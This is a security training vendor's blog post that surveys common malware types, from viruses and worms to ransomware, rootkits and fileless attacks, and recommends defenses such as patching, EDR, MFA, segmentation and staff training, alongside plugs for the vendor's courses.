In 2022, the FBI's Internet Crime Complaint Center (IC3) received over 800,000 complaints with losses exceeding $10.3 billion — and malware was the engine behind a staggering number of those incidents. I've spent years watching organizations get blindsided not because they lacked firewalls, but because nobody on the team could tell a trojan from a rootkit. Understanding the types of malware isn't an academic exercise. It's the difference between catching an attack in the first five minutes and discovering it five months later during a forensic investigation.
This post is a field guide. I'm going to walk you through each major malware category, show you how threat actors actually deploy them, and point you to the defenses that work in practice — not just in theory.
Why Knowing the Types of Malware Still Matters in 2023
You might think malware classification is Security 101 — something you covered in a cert exam and moved on from. But here's what I've seen over and over: incident response teams misidentify the malware family during triage, which leads to the wrong containment strategy, which leads to reinfection within days.
The Verizon 2022 Data Breach Investigations Report found that 40% of breaches involved malware of some kind, with ransomware alone appearing in 25% of all breaches — a jump from prior years. Each type of malware behaves differently, spreads differently, and demands a different response. If your security awareness training doesn't cover this in practical terms, your people are flying blind.
That's exactly why we built our cybersecurity awareness training course — to give employees and IT teams the real-world knowledge they need to recognize and respond to threats before damage is done.
Viruses: The Original Threat That Never Left
Computer viruses are self-replicating code that attaches to legitimate programs or files. They need a host — a document, an executable, a macro — and they need human action to spread. You open the file, the virus activates.
Viruses aren't the headline-grabbers they were in the early 2000s, but they haven't disappeared. I still see them embedded in pirated software downloads and weaponized Office documents. The key characteristic: they can't spread without you doing something first.
How Viruses Typically Arrive
- Email attachments with malicious macros
- Infected USB drives (still a real vector — ask the Department of Defense)
- Trojanized software downloaded from unofficial sources
Worms: Self-Spreading and Self-Sufficient
Unlike viruses, worms don't need a host file or human interaction to propagate. They exploit vulnerabilities in networks and operating systems to spread autonomously. WannaCry in 2017 remains the textbook example — it leveraged the EternalBlue exploit in Windows SMB to tear through networks in over 150 countries, hitting the UK's National Health Service especially hard.
Worms are terrifying because of their speed. One vulnerable endpoint on your network is all it takes. This is why CISA's Known Exploited Vulnerabilities Catalog exists — patching the vulnerabilities worms exploit is your single best defense.
Ransomware: The $4.88M Problem
Ransomware encrypts your files and demands payment for the decryption key. That's the simple version. The reality in 2023 is far uglier.
Modern ransomware gangs like LockBit, BlackCat (ALPHV), and Royal don't just encrypt — they exfiltrate data first and threaten to publish it. This double extortion model means even organizations with solid backups face massive pressure to pay. The FBI's IC3 received 2,385 ransomware complaints in 2022 with adjusted losses over $34.3 million — and that's just what was reported. The real number is multiples higher.
The Ransomware Kill Chain
In my experience, ransomware almost never arrives as the first payload. The typical attack chain looks like this:
- Initial access: Phishing email with a malicious link or attachment
- Foothold: Commodity malware like Emotet or QakBot drops onto the endpoint
- Lateral movement: The threat actor uses credential theft tools like Mimikatz to move across the network
- Exfiltration: Sensitive data is copied to attacker-controlled infrastructure
- Detonation: Ransomware is deployed network-wide, often on a Friday night or holiday
Breaking any link in that chain stops the attack. That's why phishing simulation and security awareness training are so critical — they target the initial access point. Our phishing awareness training for organizations is designed to drill exactly these scenarios with your teams.
Trojans: The Malware That Wears a Disguise
Trojans masquerade as legitimate software. The user thinks they're installing a PDF reader, a game crack, or a browser update. Instead, they're handing a threat actor a foothold on their machine.
Trojans are one of the most common types of malware I encounter in incident response. Emotet started life as a banking trojan before evolving into a full malware distribution platform. TrickBot followed a similar path. These aren't simple programs — they're modular frameworks that download additional payloads, steal credentials, and open backdoors for ransomware operators.
Remote Access Trojans (RATs)
A subset worth special attention. RATs give attackers full remote control of an infected system — access to the webcam, the keyboard, the file system, everything. They're favored by both cybercriminals and nation-state actors. If you've ever wondered how corporate espionage actually works in practice, RATs are often the answer.
Spyware and Keyloggers: Silent Data Thieves
Spyware monitors user activity and sends data back to the attacker. Keyloggers — a specific type of spyware — record every keystroke. Passwords, credit card numbers, private messages, internal memos — all captured in real time.
These tools are often bundled with other malware or installed through social engineering. I've investigated cases where a single keylogger on a finance department workstation led to wire fraud losses exceeding $200,000. The keylogger had been active for three months before anyone noticed.
Multi-factor authentication is your best countermeasure here. Even if an attacker captures a password via keylogger, MFA adds a barrier they can't easily bypass — especially hardware-based tokens or authenticator apps.
Rootkits: The Malware You Can't See
Rootkits operate at the deepest levels of the operating system — sometimes at the kernel level, sometimes in the firmware. Their entire purpose is to hide other malware from detection. Antivirus won't catch them. Standard monitoring won't flag them.
Rootkits are relatively rare compared to ransomware or trojans, but when they appear, the damage is severe and remediation is brutal. In many cases, I recommend full hardware replacement rather than trying to clean a firmware-level rootkit. You simply can't trust the machine anymore.
How Rootkits Relate to Zero Trust
This is one reason the zero trust security model has gained so much traction. If you assume every device could be compromised — including by something invisible like a rootkit — you design your network so that no single compromised device gives an attacker the keys to the kingdom. Verify everything. Trust nothing implicitly.
Adware and Potentially Unwanted Programs (PUPs)
Adware generates revenue for its creator by displaying unwanted advertisements. It's annoying, but the security risk is real — adware often redirects browsers to malicious sites or bundles itself with spyware.
I don't spend a lot of time worrying about adware in enterprise environments because endpoint detection tools handle it well. But in small businesses and home offices? It's everywhere. And it's often the gateway to more serious infections.
Fileless Malware: Living Off the Land
Fileless malware doesn't write traditional files to disk. Instead, it abuses legitimate system tools — PowerShell, WMI, the Windows Registry — to execute malicious actions entirely in memory. This makes it extremely difficult for traditional antivirus to detect.
The National Institute of Standards and Technology (NIST) has emphasized the need for behavioral detection capabilities specifically because fileless techniques bypass signature-based tools. If your security stack relies solely on scanning files, you're missing an entire category of attacks.
Common Fileless Techniques
- PowerShell abuse: Downloading and executing payloads directly in memory
- Registry persistence: Storing malicious scripts in registry keys that execute at startup
- DLL injection: Loading malicious code into running processes
- Macro-based attacks: Office macros that invoke system tools without dropping files
What Type of Malware Is Most Common?
Based on the FBI IC3 2022 Internet Crime Report and industry data, ransomware and phishing-delivered trojans dominate the current threat landscape. Ransomware gets the headlines because of the financial impact. But commodity trojans like QakBot and Emotet (before its January 2021 takedown and subsequent resurgence) are the delivery vehicles that make ransomware attacks possible.
Social engineering — particularly phishing — remains the primary initial access vector for nearly every type of malware. That's not a technology problem. It's a people problem. And it requires a people-focused solution.
Defending Against Every Type of Malware: What Actually Works
I'm not going to give you a generic checklist. Here's what I've seen actually reduce malware incidents in organizations I've worked with:
1. Patch Ruthlessly and Quickly
Worms and exploit-based malware depend on known vulnerabilities. CISA's Known Exploited Vulnerabilities Catalog tells you exactly what to prioritize. If you're not patching critical vulnerabilities within 48 hours of disclosure, you're accepting unnecessary risk.
2. Deploy Endpoint Detection and Response (EDR)
Traditional antivirus is insufficient against fileless malware, rootkits, and modern trojans. EDR tools monitor behavior — not just file signatures — and can catch attacks that legacy tools miss entirely.
3. Enforce Multi-Factor Authentication Everywhere
Credential theft is a component of almost every serious malware campaign. MFA doesn't make you invincible, but it eliminates the easiest path attackers have into your systems.
4. Train Your People — Continuously
Phishing simulation isn't a one-and-done exercise. Threat actors change tactics constantly. Your training has to keep pace. Enroll your team in ongoing cybersecurity awareness training and run regular phishing simulations that mirror current attack campaigns.
5. Implement Network Segmentation
If ransomware or a worm gets into one subnet, segmentation prevents it from reaching your crown jewels. This is zero trust in practice — limit blast radius by design.
6. Maintain and Test Backups
Backups are your last line of defense against ransomware. But untested backups are worthless. I've seen organizations discover during a ransomware incident that their backup tapes were corrupted — or worse, also encrypted because the backup system was on the same network.
The Threat Landscape Is Evolving — Your Defenses Should Too
Every category of malware I've described here is actively being used by threat actors right now, in April 2023. Some are decades old. Some barely existed five years ago. The attackers don't care about categories — they chain multiple types of malware together in a single campaign to achieve their objectives.
Your job is to make every link in that chain as hard to exploit as possible. That starts with understanding what you're up against. It continues with building layered defenses — technical controls, security awareness, and incident response capabilities working together.
The organizations that get breached aren't always the ones with the weakest technology. They're the ones where nobody recognized the phishing email, nobody questioned the suspicious download, and nobody knew what a trojan looked like until it was too late.
Don't let that be your organization.